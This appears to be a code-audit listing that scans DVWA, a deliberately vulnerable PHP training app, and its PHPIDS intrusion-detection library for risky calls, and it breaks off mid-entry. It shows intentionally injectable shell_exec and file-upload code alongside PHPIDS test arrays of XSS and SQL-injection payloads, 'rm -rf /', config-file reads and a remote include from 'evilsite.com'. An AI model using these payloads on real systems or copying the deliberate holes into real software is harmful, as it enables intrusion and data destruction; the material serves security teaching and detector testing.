6:	eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=500,height=300,left = 540,top = 250');");
7-}
8-
9-/* Form validation */

php

eval( (11) Top | Hide

./security.php:96 (1/11) OK | Dubious | Bad | Hide 
94-
95-	<p>{$phpIdsHtml}</p>
96:	[<a href=\"?test=%22><script>eval(window.name)</script>\">Simulate attack</a>] -
97-	[<a href=\"ids_log.php\">View IDS log</a>]
98-	
99-</div>
./external/phpids/0.6/docs/examples/example.php:113 (2/11) OK | Dubious | Bad | Hide 
110-        
111-
112-    } else {
113:        echo '<a href="?test=%22><script>eval(window.name)</script>">No attack detected - click for an example attack</a>';
114-    }
115-} catch (Exception $e) {
116-    /*
./external/phpids/0.6/tests/IDS/MonitorTest.php:409 (3/11) OK | Dubious | Bad | Hide 
406-                        default xml namespace=toolbar,y=1&&name
407-                        default xml namespace=toolbar
408-                        default xml namespace=e(y)';
409:        $exploits[] = '-Infinity++in eval(1&&name)';
410-        $exploits[] = 'new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array,
411-                        x=(\'e\')
412-                        x=(\'nam\')+(new Array)+x
./external/phpids/0.6/tests/IDS/MonitorTest.php:475 (4/11) OK | Dubious | Bad | Hide 
472-
473-        $exploits = array();
474-        $exploits[] = "/*@cc_on@set@x=88@set@ss=83@set@s=83@*/@cc_on alert(String.fromCharCode(@x,@s,@ss))";
475:        $exploits[] = "@cc_on eval(@cc_on name)";
476-        $exploits[] = "@if(@_mc680x0)@else alert(@_jscript_version)@end";
477-        $exploits[] = "\"\"@cc_on,x=@cc_on'something'@cc_on";
478-
./external/phpids/0.6/tests/IDS/MonitorTest.php:492 (5/11) OK | Dubious | Bad | Hide 
489-    public function testXSSList() {
490-
491-        $exploits = array();
492:        $exploits[] = '\'\'"--><script>eval(String.fromCharCode(88,83,83)));%00';
493-        $exploits[] = '"></a style="xss:ex/**/pression(alert(1));"';
494-        $exploits[] = 'top.__proto__._= alert
495-                       _(1)';
./external/phpids/0.6/tests/IDS/MonitorTest.php:519 (6/11) OK | Dubious | Bad | Hide 
516-        $exploits[] = "e=1..eval
517-                        e(e(\"\u200fname\"),e)";
518-        $exploits[] = "<x///style=-moz-\&#x362inding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>";
519:        $exploits[] = "a//a'\u000aeval(name)";
520:        $exploits[] = "a//a';eval(name)";
521-        $exploits[] = "(x) setter=0?0.:alert,x=0";
522-        $exploits[] = "y=('na') + new Array +'me'
523-                        y
./external/phpids/0.6/tests/IDS/MonitorTest.php:580 (7/11) OK | Dubious | Bad | Hide 
577-        $exploits[] = 'a=eval,b= [ referrer ] ;a(b)';
578-        $exploits[] = "URL = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ] ]
579-                        (/z/g, [] ) : 0";
580:        $exploits[] = "if(0){} else eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array)
581-                        'foo bar foo bar foo'";
582:        $exploits[] = "switch('foo bar foo bar foo bar') {case eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array):}";
583-        $exploits[] = "xxx='javascr',xxx+=('ipt:eva'),xxx+=('l(n'),xxx+=('ame),y')
584-                        Cen:tri:fug:eBy:pas:sTe:xt:do location=(xxx)
585-                        while(0)
./external/phpids/0.6/tests/IDS/MonitorTest.php:1073 (8/11) OK | Dubious | Bad | Hide 
1070-
1071-        $exploits = array();
1072-        $exploits[] = '+alert(1)';
1073:        $exploits[] = 'ACM=1,1+eval(1+name+(+ACM-1),ACM)';
1074:        $exploits[] = '1+eval(1+name+(+1-1),-1)';
1075-        $exploits[] = 'XSS without being noticed<a/href=da&#x74&#97:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test';
1076-
1077-        $this->_testForPlainEvent($exploits);
./external/phpids/0.6/tests/IDS/MonitorTest.php:1272 (9/11) OK | Dubious | Bad | Hide 
1269-    public function testJSONScanning() {
1270-
1271-        $exploits = array();
1272:        $exploits['json_1'] = '{"a":"b","c":["><script>alert(1);</script>", 111, "eval(name)"]}';
1273-        $test = new IDS_Monitor(
1274-            $exploits,
1275-            $this->init
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/InterchangeBuilder.php:140 (10/11) OK | Dubious | Bad | Hide 
137-     * Evaluates an array PHP code string without array() wrapper
138-     */
139-    protected function evalArray($contents) {
140:        return eval('return array('. $contents .');');
141-    }
142-    
143-    /**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/VarParser/Native.php:17 (11/11) OK | Dubious | Bad | Hide 
14-    
15-    protected function evalExpression($expr) {
16-        $var = null;
17:        $result = eval("\$var = $expr;");
18-        if ($result === false) {
19-            throw new HTMLPurifier_VarParserException("Fatal error in evaluated code");
20-        }

exec( (5) Top | Hide

./vulnerabilities/exec/source/low.php:10 (1/5) OK | Dubious | Bad | Hide 
8-	if (stristr(php_uname('s'), 'Windows NT')) { 
9-	
10:		$cmd = shell_exec( 'ping  ' . $target );
11-		$html .= '<pre>'.$cmd.'</pre>';
12-		
13-	} else { 
14-	
15:		$cmd = shell_exec( 'ping  -c 3 ' . $target );
16-		$html .= '<pre>'.$cmd.'</pre>';
17-		
18-	}
./vulnerabilities/exec/source/high.php:23 (2/5) OK | Dubious | Bad | Hide 
20-		// Determine OS and execute the ping command.
21-		if (stristr(php_uname('s'), 'Windows NT')) { 
22-	
23:			$cmd = shell_exec( 'ping  ' . $target );
24-			$html .= '<pre>'.$cmd.'</pre>';
25-		
26-		} else { 
27-	
28:			$cmd = shell_exec( 'ping  -c 3 ' . $target );
29-			$html .= '<pre>'.$cmd.'</pre>';
30-		
31-		}
./vulnerabilities/exec/source/medium.php:18 (3/5) OK | Dubious | Bad | Hide 
15-	// Determine OS and execute the ping command.
16-	if (stristr(php_uname('s'), 'Windows NT')) { 
17-	
18:		$cmd = shell_exec( 'ping  ' . $target );
19-		$html .= '<pre>'.$cmd.'</pre>';
20-		
21-	} else { 
22-	
23:		$cmd = shell_exec( 'ping  -c 3 ' . $target );
24-		$html .= '<pre>'.$cmd.'</pre>';
25-		
26-	}
./external/phpids/0.6/tests/IDS/MonitorTest.php:238 (4/5) OK | Dubious | Bad | Hide 
235-        $exploits[] = 'b=(navigator);c=(b.userAgent);d=c[61]+c[49]+c[6]+c[4];e=\'\'+/abcdefghijklmnopqrstuvwxyz.(1)/;f=e[12]+e[15]+e[3]+e[1]+e[20]+e[9]+e[15]+e[14]+e[27]+e[8]+e[1]+e[19]+e[8]+e[27]+e[19]+e[21]+e[2]+e[19]+e[20]+e[18]+e[9]+e[14]+e[7]+e[28]+e[29]+e[30];0[\'\'+[d]](0[\'\'+(d)](f));';
236-        $exploits[] = "c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';c1=1==1&&'javascript';a=c1+c2+c3+'t'+c4;(URL=a);";
237-        $exploits[] = "x=''+/abcdefghijklmnopqrstuvwxyz.(1)/;e=x[5];v=x[22];a=x[1];l=x[12];o=x[15];c=x[3];t=x[20];i=x[9];n=x[14];h=x[8];s=x[19];u=x[21];b=x[2];r=x[18];g=x[7];dot=x[27];uno=x[29];op=x[28];cp=x[30];z=e+v+a+l;y=l+o+c+a+t+i+o+n+dot+h+a+s+h+dot+s+u+b+s+t+r+i+n+g+op+uno+cp;0[''+[z]](0[''+(z)](y));";
238:        $exploits[] = "d=''+/eval~locat~ion.h~ash.su~bstring(1)/;e=/.(x?.*)~(x?.*)~(x?.*)~(x?.*)~(x?.*)./;f=e.exec(d);g=f[2];h=f[3];i=f[4];j=f[5];k=g+h+i+j;0[''+(f[1])](0[''+(f[1])](k));";
239-        $exploits[] = "a=1!=1?/x/:'eva';b=1!=1?/x/:'l';a=a+b;e=1!=1?/x/:'h';b=1!=1?/x/:'locatio';c=1!=1?/x/:'n';d=1!=1?/x/:'.has';h=1!=1?/x/:'1)';g=1!=1?/x/:'ring(0';f=1!=1?/x/:'.subst';b=b+c+d+e+f+g+h;B=00[''+[a]](b);00[''+[a]](B);";
240-        $exploits[] = "(z=String)&&(z=z() );{a=(1!=1)?a:'eva'+z}{a+=(1!=1)?a:'l'+z}{b=(1!=1)?b:'locatio'+z}{b+=(1!=1)?b:'n.has'+z}{b+=(1!=1)?b:'h.subst'+z}{b+=(1!=1)?b:'r(1)'+z}{c=(1!=1)?c:(0)[a]}{d=c(b)}{c(d)}";
241-        $exploits[] = "{z=(1==4)?here:{z:(1!=5)?'':be}}{y=(9==2)?dragons:{y:'l'+z.z}}{x=(6==5)?3:{x:'a'+y.y}}{w=(5==8)?9:{w:'ev'+x.x}}{v=(7==9)?3:{v:'tr(2)'+z.z}}{u=(3==8)?4:{u:'sh.subs'+v.v}}{t=(6==2)?6:{t:y.y+'ocation.ha'+u.u}}{s=(4==3)?3:{s:(8!=3)?(2)[w.w]:z}}{r=s.s(t.t)}{s.s(r)+z.z}";
./external/phpids/0.6/tests/IDS/MonitorTest.php:1012 (5/5) OK | Dubious | Bad | Hide 
1009-        $exploits = array();
1010-        $exploits[] = ';phpinfo()';
1011-        $exploits[] = '@phpinfo()';
1012:        $exploits[] = '"; <?php exec("rm -rf /"); ?>';
1013-        $exploits[] = '; file_get_contents(\'/usr/local/apache2/conf/httpd.conf\');';
1014-        $exploits[] = ';echo file_get_contents(implode(DIRECTORY_SEPARATOR, array("usr","local","apache2","conf","httpd.conf"))';
1015-        $exploits[] = '; include "http://evilsite.com/evilcode"';

fclose( (7) Top | Hide

./external/phpids/0.6/lib/IDS/Caching/Memcached.php:154 (1/7) OK | Dubious | Bad | Hide 
152-        if (!file_exists($this->path)) {
153-            $handle = fopen($this->path, 'w');
154:            fclose($handle);
155-        }
156-
157-        if (!is_writable($this->path)) {
./external/phpids/0.6/lib/IDS/Caching/File.php:149 (2/7) OK | Dubious | Bad | Hide 
146-            }
147-            
148-            fwrite($handle, serialize($data));
149:            fclose($handle);
150-        }
151-
152-        return $this;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:41 (3/7) OK | Dubious | Bad | Hide 
38-        $fh = fopen($file, 'r');
39-        if (!$fh) return false;
40-        $ret = $this->parseHandle($fh);
41:        fclose($fh);
42-        return $ret;
43-    }
44-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:56 (4/7) OK | Dubious | Bad | Hide 
53-        while (!feof($fh)) {
54-            $ret[] = $this->parseHandle($fh);
55-        }
56:        fclose($fh);
57-        return $ret;
58-    }
59-
./external/phpids/0.6/lib/IDS/Log/File.php:197 (5/7) OK | Dubious | Bad | Hide 
194-
195-                        $handle = fopen($this->logfile, 'a');
196-                        fwrite($handle, trim($data) . "\n");
197:                        fclose($handle);
198-
199-                    } else {
200-                        throw new Exception(
./external/phpids/0.6/lib/IDS/Log/Email.php:244 (6/7) OK | Dubious | Bad | Hide 
241-        if (!file_exists($file)) {
242-            $handle = fopen($file, 'w');
243-            fwrite($handle, time());
244:            fclose($handle);
245-
246-            return false;
247-        }
./dvwa/includes/dvwaPhpIds.inc.php:47 (7/7) OK | Dubious | Bad | Hide 
44-function dvwaClearIdsLog()	{
45-	if (isset($_GET['clear_log'])) { 
46-		$fp = fopen(DVWA_WEB_PAGE_TO_PHPIDS_LOG, w);
47:		fclose($fp);
48-		dvwaMessagePush( "PHPIDS log cleared" );
49-		dvwaPageReload();
50-	}

file( (9) Top | Hide

./vulnerabilities/upload/source/low.php:7 (1/9) OK | Dubious | Bad | Hide 
5-			$target_path = $target_path . basename( $_FILES['uploaded']['name']);
6-
7:			if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
8-				
9-				$html .= '<pre>';
10-				$html .= 'Your image was not uploaded.';
./vulnerabilities/upload/source/high.php:13 (2/9) OK | Dubious | Bad | Hide 
10-			if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
11-
12-
13:				if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
14-					
15-					$html .= '<pre>';
16-					$html .= 'Your image was not uploaded.';
./vulnerabilities/upload/source/medium.php:13 (3/9) OK | Dubious | Bad | Hide 
10-			if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
11-
12-
13:				if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
14-				
15-					$html .= '<pre>';
16-					$html .= 'Your image was not uploaded.';
./external/phpids/0.6/lib/IDS/Filter/Storage.php:206 (4/9) OK | Dubious | Bad | Hide 
203-            if (!$filters) {
204-                if (file_exists($this->source)) {
205-                    if (LIBXML_VERSION >= 20621) {
206:                        $filters = simplexml_load_file($this->source,
207-                                                       null,
208-                                                       LIBXML_COMPACT);
209-                    } else {
210:                        $filters = simplexml_load_file($this->source);
211-                    }
212-                }
213-            }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/InterchangeBuilder.php:21 (5/9) OK | Dubious | Bad | Hide 
18-        $interchange = new HTMLPurifier_ConfigSchema_Interchange();
19-        
20-        if (!$dir) $dir = HTMLPURIFIER_PREFIX . '/HTMLPurifier/ConfigSchema/schema/';
21:        $info = parse_ini_file($dir . 'info.ini');
22-        $interchange->name = $info['name'];
23-        
24-        $files = array();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:459 (6/9) OK | Dubious | Bad | Hide 
456-     */
457-    public function loadIni($filename) {
458-        if ($this->isFinalized('Cannot load directives after finalization')) return;
459:        $array = parse_ini_file($filename, true);
460-        $this->loadArray($array);
461-    }
462-
./external/phpids/0.6/lib/IDS/Log/Email.php:221 (7/9) OK | Dubious | Bad | Hide 
218-        $numPrefixChars = strlen($this->file_prefix);
219-        $files          = scandir($dir);
220-        foreach ($files as $file) {
221:            if (is_file($dir . $file)) {
222-                if (substr($file, 0, $numPrefixChars) == $this->file_prefix) {
223-                    $lastModified = filemtime($dir . $file);
224-
./external/phpids/0.6/lib/IDS/Init.php:92 (8/9) OK | Dubious | Bad | Hide 
89-
90-        if ($configPath) {
91-            $this->setConfigPath($configPath);
92:            $this->config = parse_ini_file($this->configPath, true);
93-        }
94-    }
95-
./dvwa/includes/dvwaPhpIds.inc.php:23 (9/9) OK | Dubious | Bad | Hide 
20-// PHPIDS Log parsing function 
21-function dvwaReadIdsLog() {
22-
23:	$file_array = file(DVWA_WEB_PAGE_TO_PHPIDS_LOG);
24-	
25-	$data = '';
26-

file_get_contents( (12) Top | Hide

./instructions.php:25 (1/12) OK | Dubious | Bad | Hide 
23-$readFile = $docs[ $selectedDocId ][ 'file' ];
24-
25:$instructions = file_get_contents( DVWA_WEB_PAGE_TO_ROOT.$readFile );
26-
27-function urlReplace( $matches ) {
28-	return dvwaExternalLinkUrlGet( $matches[1] );
./vulnerabilities/view_source.php:44 (2/12) OK | Dubious | Bad | Hide 
41-}
42-
43-
44:$source = @file_get_contents( DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/{$id}/source/{$security}.php" );
45-$source = str_replace( array( '$html .=' ), array( 'echo' ), $source );
46-
47-$page[ 'body' ] .= "
./vulnerabilities/view_help.php:14 (3/12) OK | Dubious | Bad | Hide 
11-$id = $_GET[ 'id' ];
12-$security = $_GET[ 'security' ];
13-
14:$help = file_get_contents( DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/{$id}/help/help.php" );
15-
16-$page[ 'body' ] .= "
17-<div class=\"body_padded\">
./vulnerabilities/view_source_all.php:12 (4/12) OK | Dubious | Bad | Hide 
9-
10-$id = $_GET[ 'id' ];
11-
12:$lowsrc = @file_get_contents("./{$id}/source/low.php");
13-$lowsrc = str_replace( array( '$html .=' ), array( 'echo' ), $lowsrc);
14-$lowsrc = highlight_string($lowsrc, true);
15-
16:$medsrc = @file_get_contents("./{$id}/source/medium.php");
17-$medsrc = str_replace( array( '$html .=' ), array( 'echo' ), $medsrc);
18-$medsrc = highlight_string($medsrc, true);
19-
20:$highsrc = @file_get_contents("./{$id}/source/high.php");
21-$highsrc = str_replace( array( '$html .=' ), array( 'echo' ), $highsrc);
22-$highsrc = highlight_string($highsrc, true);
23-
./external/phpids/0.6/tests/IDS/MonitorTest.php:1013 (5/12) OK | Dubious | Bad | Hide 
1010-        $exploits[] = ';phpinfo()';
1011-        $exploits[] = '@phpinfo()';
1012-        $exploits[] = '"; <?php exec("rm -rf /"); ?>';
1013:        $exploits[] = '; file_get_contents(\'/usr/local/apache2/conf/httpd.conf\');';
1014:        $exploits[] = ';echo file_get_contents(implode(DIRECTORY_SEPARATOR, array("usr","local","apache2","conf","httpd.conf"))';
1015-        $exploits[] = '; include "http://evilsite.com/evilcode"';
1016-        $exploits[] = '; rm -rf /\0';
1017-        $exploits[] = '"; $_a=(! \'a\') . "php"; $_a.=(! \'a\') . "info"; $_a(1); $b="';
./external/phpids/0.6/lib/IDS/Filter/Storage.php:305 (6/12) OK | Dubious | Bad | Hide 
302-             */
303-            if (!$filters) {
304-                if (file_exists($this->source)) {
305:                    $filters = json_decode(file_get_contents($this->source));
306-                } else {
307-                    throw new Exception(
308-                        'JSON data could not be loaded.' .
./external/phpids/0.6/lib/IDS/Caching/File.php:169 (7/12) OK | Dubious | Bad | Hide 
166-        // make sure filters are parsed again if cache expired
167-        if (file_exists($this->path) && (time()-filectime($this->path)) < 
168-            $this->config['expiration_time']) {
169:            $data = unserialize(file_get_contents($this->path));
170-              return $data;
171-        }
172-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:33 (8/12) OK | Dubious | Bad | Hide 
30-    public function get($config) {
31-        $file = $this->generateFilePath($config);
32-        if (!file_exists($file)) return false;
33:        return unserialize(file_get_contents($file));
34-    }
35-    
36-    public function remove($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema.php:54 (9/12) OK | Dubious | Bad | Hide 
51-     * Unserializes the default ConfigSchema.
52-     */
53-    public static function makeFromSerial() {
54:        return unserialize(file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/ConfigSchema/schema.ser'));
55-    }
56-    
57-    /**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/EntityLookup.php:23 (10/12) OK | Dubious | Bad | Hide 
20-        if (!$file) {
21-            $file = HTMLPURIFIER_PREFIX . '/HTMLPurifier/EntityLookup/entities.ser';
22-        }
23:        $this->table = unserialize(file_get_contents($file));
24-    }
25-    
26-    /**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer/ConfigForm.php:62 (11/12) OK | Dubious | Bad | Hide 
59-     * Retrieves styling, in case it is not accessible by webserver
60-     */
61-    public static function getCSS() {
62:        return file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/Printer/ConfigForm.css');
63-    }
64-    
65-    /**
66-     * Retrieves JavaScript, in case it is not accessible by webserver
67-     */
68-    public static function getJavaScript() {
69:        return file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/Printer/ConfigForm.js');
70-    }
71-    
72-    /**
./external/phpids/0.6/lib/IDS/Log/Email.php:249 (12/12) OK | Dubious | Bad | Hide 
246-            return false;
247-        }
248-
249:        $lastAttack = file_get_contents($file);
250-        $difference = time() - $lastAttack;
251-        if ($difference > $this->allowed_rate) {
252-            unlink($file);

fopen( (7) Top | Hide

./external/phpids/0.6/lib/IDS/Caching/Memcached.php:153 (1/7) OK | Dubious | Bad | Hide 
151-
152-        if (!file_exists($this->path)) {
153:            $handle = fopen($this->path, 'w');
154-            fclose($handle);
155-        }
156-
./external/phpids/0.6/lib/IDS/Caching/File.php:142 (2/7) OK | Dubious | Bad | Hide 
139-        
140-        if ((!file_exists($this->path) || (time()-filectime($this->path)) > 
141-            $this->config['expiration_time'])) {
142:            $handle = @fopen($this->path, 'w+');
143-            
144-            if (!$handle) {
145-                throw new Exception("Cache file couldn't be created");
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:38 (3/7) OK | Dubious | Bad | Hide 
35-     */
36-    public function parseFile($file) {
37-        if (!file_exists($file)) return false;
38:        $fh = fopen($file, 'r');
39-        if (!$fh) return false;
40-        $ret = $this->parseHandle($fh);
41-        fclose($fh);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:51 (4/7) OK | Dubious | Bad | Hide 
48-    public function parseMultiFile($file) {
49-        if (!file_exists($file)) return false;
50-        $ret = array();
51:        $fh = fopen($file, 'r');
52-        if (!$fh) return false;
53-        while (!feof($fh)) {
54-            $ret[] = $this->parseHandle($fh);
./external/phpids/0.6/lib/IDS/Log/File.php:195 (5/7) OK | Dubious | Bad | Hide 
192-                if (!empty($data)) {
193-                    if (is_writable($this->logfile)) {
194-
195:                        $handle = fopen($this->logfile, 'a');
196-                        fwrite($handle, trim($data) . "\n");
197-                        fclose($handle);
198-
./external/phpids/0.6/lib/IDS/Log/Email.php:242 (6/7) OK | Dubious | Bad | Hide 
239-        $file       = $dir . DIRECTORY_SEPARATOR . $filename;
240-
241-        if (!file_exists($file)) {
242:            $handle = fopen($file, 'w');
243-            fwrite($handle, time());
244-            fclose($handle);
245-
./dvwa/includes/dvwaPhpIds.inc.php:46 (7/7) OK | Dubious | Bad | Hide 
43-// Clear PHPIDS log
44-function dvwaClearIdsLog()	{
45-	if (isset($_GET['clear_log'])) { 
46:		$fp = fopen(DVWA_WEB_PAGE_TO_PHPIDS_LOG, w);
47-		fclose($fp);
48-		dvwaMessagePush( "PHPIDS log cleared" );
49-		dvwaPageReload();

goto (1) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:626 (1/1) OK | Dubious | Bad | Hide 
624-        $exploits[] = 'asd\' union (select username,password from admins) where id=\'1';
625-        $exploits[] = "1'; WAITFOR TIME '17:48:00 ' shutdown -- -a";
626:        $exploits[] = "1'; anything: goto anything -- -a";
627-        $exploits[] = "' =+ '";
628-        $exploits[] = "asd' =- (-'asd') -- -a";
629-        $exploits[] = 'aa"in+ ("aa") or -1 != "0';

include (70) Top | Hide

./instructions.php:4 (1/70) OK | Dubious | Bad | Hide 
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./index.php:5 (2/70) OK | Dubious | Bad | Hide 
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
8-
./login.php:5 (3/70) OK | Dubious | Bad | Hide 
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'phpids' ) );
8-
./ids_log.php:4 (4/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-define( 'DVWA_WEB_ROOT_TO_PHPIDS_LOG', 'external/phpids/'.dvwaPhpIdsVersionGet().'/lib/IDS/tmp/phpids_log.txt' );
7-define( 'DVWA_WEB_PAGE_TO_PHPIDS_LOG', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS_LOG );
./about.php:4 (5/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./about.php:54 (6/70) OK | Dubious | Bad | Hide 
51-	the Free Software Foundation, either version 3 of the License, or
52-	(at your option) any later version.</p>
53-
54:	<p>The PHPIDS library is included, in good faith, with this DVWA distribution. The operation of PHPIDS is provided without support from the DVWA team. It is licensed under <a href=\"".DVWA_WEB_PAGE_TO_ROOT."instructions.php?doc=PHPIDS-license\">separate terms</a> to the DVWA code.</p>
55-
56-	<h2>Development</h2>
57-
./security.php:4 (7/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:4 (8/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/fi/include.php:9 (9/70) OK | Dubious | Bad | Hide 
6-
7-	<div class=\"vulnerable_code_area\">
8-
9:		To include a file edit the ?page=index.php in the URL to determine which file is included.
10-
11-	</div>
12-
./vulnerabilities/fi/index.php:4 (10/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/fi/index.php:35 (11/70) OK | Dubious | Bad | Hide 
32-$page[ 'help_button' ] = 'fi';
33-$page[ 'source_button' ] = 'fi';
34-
35:include($file);
36-
37-dvwaHtmlEcho( $page );
38-
./vulnerabilities/fi/source/high.php:5 (12/70) OK | Dubious | Bad | Hide 
2-		
3-	$file = $_GET['page']; //The page we wish to display 
4-
5:	// Only allow include.php
6:	if ( $file != "include.php" ) {
7-		echo "ERROR: File not found!";
8-		exit;
9-	}
./vulnerabilities/sqli_blind/index.php:4 (13/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/view_source.php:4 (14/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:4 (15/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/help/help.php:11 (16/70) OK | Dubious | Bad | Hide 
8-	
9-	<p>Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.</p>
10-
11:	<p>Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, given and family names, any too short password 
12-	(usually thought to be 6 or 7 characters or less), or any password meeting a too restrictive and so predictable, pattern (eg, alternating vowels and consonants).</p>
13-
14-	<p>A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always
./vulnerabilities/exec/index.php:4 (17/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/upload/index.php:4 (18/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/view_help.php:4 (19/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli/index.php:4 (20/70) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/view_source_all.php:3 (21/70) OK | Dubious | Bad | Hide 
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./vulnerabilities/xss_s/index.php:4 (22/70) OK | Dubious | Bad | Hide 
1-<?php
2-
